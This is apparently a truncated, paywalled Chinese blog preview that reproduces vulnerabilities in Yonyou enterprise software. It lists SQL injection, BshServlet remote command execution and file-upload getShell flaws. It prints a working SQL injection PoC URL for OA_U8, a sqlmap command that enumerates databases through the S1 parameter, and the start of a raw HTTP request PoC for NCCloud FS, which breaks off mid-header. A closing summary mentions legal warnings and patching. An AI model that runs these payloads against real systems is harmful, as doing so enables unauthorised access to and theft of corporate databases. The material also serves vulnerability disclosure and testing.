简介
用友公司成立于1988年,全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案,是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。
漏洞情况
用友OA_U8 存在SQL 注入
用友NCCloud FS文件管理 SQL 注入
用友NC bsh.servlet.BshServlet 远程命令执行
用友NC 任意文件上传 getShell
漏洞复现
1.用友 OA_U8 SQL 注入
poc
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
如果出现一下指纹 则存在sql注入点 注入点是 S1

直接使用SqlMap 进行检测
python sqlmap.py -u url/yyoa/common/js/menu/test.jsp?doType=101&S1=1 --random-agent -p S1 --dbs
2.用友 NCCloud FS文件管理 SQL 注入
poc
GET /fs/console?username=123&password=%2F7Go4Iv2Xqlml0WjkQvrvzX%2FgBopF8XnfWPUk69fZs0%3D HTTP/1.1
Host: xxxxx
Upgrade-Insecure-Requests: 1
Use

本文详细介绍了用友公司多个产品存在的安全漏洞,包括SQL注入、远程命令执行和文件操作漏洞。提供了漏洞复现的POC和利用方式,并给出了相应的sqlmap检测命令。同时,文章强调了非法使用信息的危害,并提出了升级版本和限制访问等修复建议。
最低0.47元/天 解锁文章
860





